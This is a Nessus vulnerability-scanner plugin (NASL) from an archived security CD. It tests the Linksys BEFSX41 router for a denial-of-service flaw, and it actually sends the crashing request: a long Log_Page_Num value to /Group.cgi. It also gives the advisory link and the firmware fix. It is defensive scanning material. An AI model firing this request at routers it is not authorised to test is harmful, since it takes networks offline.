home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / linksys_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  63 lines

  1. #
  2. # Linksys EtherFast Cable/DSL Firewall Router
  3. # BEFSX41 (Firmware 1.44.3) DoS
  4. #
  5.  
  6. if(description)
  7. {
  8.   script_id(11891);
  9.   script_bugtraq_id(8834);
  10.   script_version ("$Revision: 1.3 $");
  11.  
  12.   name["english"] = "LinkSys EtherFast Router Denial of Service Attack";
  13.   script_name(english:name["english"]);
  14.  
  15.   desc["english"] = "
  16. The remote host seems to be a Linksys EtherFast Cable Firewall/Router.
  17.  
  18. This product is vulnerable to a remote Denial of service attack : if logging 
  19. is enabled, an attacker can specify a long URL which results in the router 
  20. becoming unresponsive.
  21.  
  22. See also: http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html
  23.  
  24. Solution: Update firmware to version 1.45.3 
  25.           http://www.linksys.com/download/firmware.asp?fwid=172.
  26.  
  27. Risk: High";
  28.  
  29.  
  30.   script_description(english:desc["english"]);
  31.   summary["english"] = "URL results in DoS of Linksys router";
  32.   script_summary(english:summary["english"]);
  33.   script_category(ACT_DENIAL);
  34.   script_copyright(english:"This script is Copyright (C) 2003 Matt North");
  35.  
  36.   family["english"] = "Denial of Service";
  37.    script_family(english:family["english"]);
  38.   script_dependencie("find_service.nes");
  39.   script_require_ports("Services/www", 80);
  40.   exit(0);
  41. }
  42.  
  43. include("http_func.inc");
  44.  
  45.  
  46. port = get_http_port(default:80);
  47.  
  48. if(http_is_dead(port:port))exit(0);
  49.  
  50. banner = get_http_banner(port:port);
  51. if(!banner)exit(0);
  52. if("linksys" >!< banner)exit(0);
  53.  
  54. soc = open_sock_tcp(port);
  55. if(!soc) exit(0);
  56.  
  57.  
  58. req = http_get(port: port, item: "/Group.cgi?Log_Page_Num=1111111111&LogClear=0");
  59. send(socket: soc , data: req);
  60. close(soc);
  61. alive = open_sock_tcp(port);
  62. if (!alive) security_hole(port);
  63.